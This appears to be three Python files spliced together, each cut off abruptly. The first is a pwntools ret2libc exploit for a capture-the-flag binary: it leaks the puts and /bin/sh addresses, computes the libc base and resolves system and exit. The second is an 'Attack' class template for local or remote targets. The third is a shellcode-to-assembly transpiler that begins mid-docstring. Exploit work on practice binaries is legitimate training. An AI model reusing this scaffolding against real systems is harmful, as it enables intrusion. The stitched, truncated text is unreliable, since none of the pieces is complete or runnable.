#! /usr/bin/env python
from pwn import process, log, context, p32, u32
from pwn import ELF
# Reset the pwntools context to a 32-bit Linux target; matches the p32/u32
# helpers imported above (4-byte packing of leaked/forged addresses).
context.clear(arch='i386', os='linux')


def main():
    elf_name = '/problems/got-2-learn-libc_2_2d4a9f3ed6bf71e90e938f1e020fb8ee/vuln'
    libc_name = 'libc.so.6'
    elf = ELF(elf_name)
    libc = ELF(libc_name)
    OFFSET_buf_to_eip = 0x9c + 4

    p = process(elf_name)

    p.recvuntil('puts: ')
    leak = p.recvline(keepends=False)
    ADDR_puts = int(leak, 16)

    p.recvuntil('useful_string: ')
    leak = p.recvline(keepends=False)
    ADDR_bin_sh = int(leak, 16)

    # Calculate libc base
    libc.address = ADDR_puts - libc.symbols['puts']
    ADDR_system = libc.symbols[
        'system']  # + 3 # +3 to avoid null byte on address
    ADDR_exit = libc.symbols['exit']

    log.info("puts    @ %s", hex(ADDR_puts))
    log.info("libc    @ %s", hex(libc.address))
#! /usr/bin/env python
import os
#
from pwn import context, p64, u64, log, process, remote, args
from pwn import gdb, ELF
# Reset the pwntools context to a 64-bit Linux target; matches the p64/u64
# helpers imported above (8-byte packing of leaked/forged addresses).
context.clear(arch='amd64', os='linux')


# Absolute path of the directory containing this script (symlinks are not
# resolved; only the path is normalised).
HERE_DIR = os.path.abspath(os.path.join(__file__, os.pardir))


class Attack:
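    def __init__(self, host, port, elf_name, libc_name=None, lib_path=None, ld_linux_name=None, gdb_script=None):
        """Record the target description and parse the binaries up front.

        Args:
            host, port: remote endpoint (used by get_process when run with
                the REMOTE argument).
            elf_name: path of the target binary; parsed into ``self.elf``.
            libc_name: optional path of the libc to compute offsets from;
                parsed into ``self.libc`` when given, otherwise ``self.libc``
                is None.
            lib_path, ld_linux_name, gdb_script: stored verbatim for later
                use (presumably by get_process; they are not interpreted here).

        Raises:
            Whatever ELF() raises for an unreadable or non-ELF file.

        NOTE(review): any offset derived from ``self.libc`` is only valid if
        this file is the exact libc build the target actually loads (compare
        build-ids / version strings before trusting a leak-based base).
        """
        self.host, self.port = host, port
        self.elf_name, self.libc_name = elf_name, libc_name
        self.lib_path = lib_path
        self.ld_linux_name = ld_linux_name
        self.gdb_script = gdb_script

        self.elf = ELF(self.elf_name)

        # Always define the attribute so callers can test `if self.libc:`
        # instead of hitting AttributeError when no libc was supplied.
        self.libc = None
        if libc_name:
            self.libc = ELF(self.libc_name)

        # Live target handle; created lazily by get_process().
        self.p = None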


    def get_process(self, ld_preload=False, ld_linux=False):
        p = None
        if args.REMOTE:
            p = remote(self.host, self.port)
The transpiler module is responsible for converting shellcode into x86 asm and
vice versa.
"""

#pylint: disable=wrong-import-position

import os
import sys


# Real (symlink-resolved) directory of this module, pushed to the front of
# sys.path — presumably so sibling modules can be imported by bare name.
MODULE_DIR_NAME = os.path.dirname(os.path.realpath(__file__))
if MODULE_DIR_NAME not in sys.path:
    # NOTE(review): index 0 means any *.py in this directory shadows a
    # same-named stdlib or site-packages module (a stray pwn.py here would
    # replace pwntools for the import below). Keep the directory's contents
    # trusted, or use sys.path.append() if shadowing is not intended.
    sys.path.insert(0, MODULE_DIR_NAME)


from pwn import asm, context, disasm, unhex


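# Configure pwntools for a 32-bit x86 Linux target in a single call, as the
# other examples do: context.clear() resets every field to its default
# *before* applying its keyword arguments, so the original two successive
# calls (arch=..., then os=...) left only the second one in effect.  That
# only worked because the default arch already matched; merging the calls
# makes the intent explicit and robust.
context.clear(arch='i686', os='linux')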


def shellcode_to_asm(shellcode, byte=True, offset=True):
    """Disassemble raw shellcode into a list of x86 asm listing lines.

    Args:
        shellcode: machine-code bytes, interpreted for the arch/os set in
            the module-level context.
        byte: passed through to disasm(); per pwntools, toggles the
            raw-bytes column of each listing line.
        offset: passed through to disasm(); per pwntools, toggles the
            offset column of each listing line.

    Returns:
        The disasm() listing split on '\\n' — one string per listing line
        (a trailing newline, if any, yields a final empty element).
    """
    listing = disasm(shellcode, byte=byte, offset=offset)
    return listing.split('\n')


def asm_to_shellcode(asm_code, vma=0):
    """Assemble x86 asm text into raw shellcode bytes.

    Args:
        asm_code: assembly source, for the arch/os set in the module-level
            context.
        vma: virtual address assumed for the start of the code (pwntools'
            ``vma`` argument); affects position-dependent encodings.

    Returns:
        The bytes produced by pwntools' asm().

    NOTE(review): asm() drives an external assembler toolchain (GNU as);
    only feed it operator-authored text, since assembler directives such
    as ``.incbin`` can pull local file contents into the output.
    """
    shellcode = asm(asm_code, vma=vma)
    return shellcode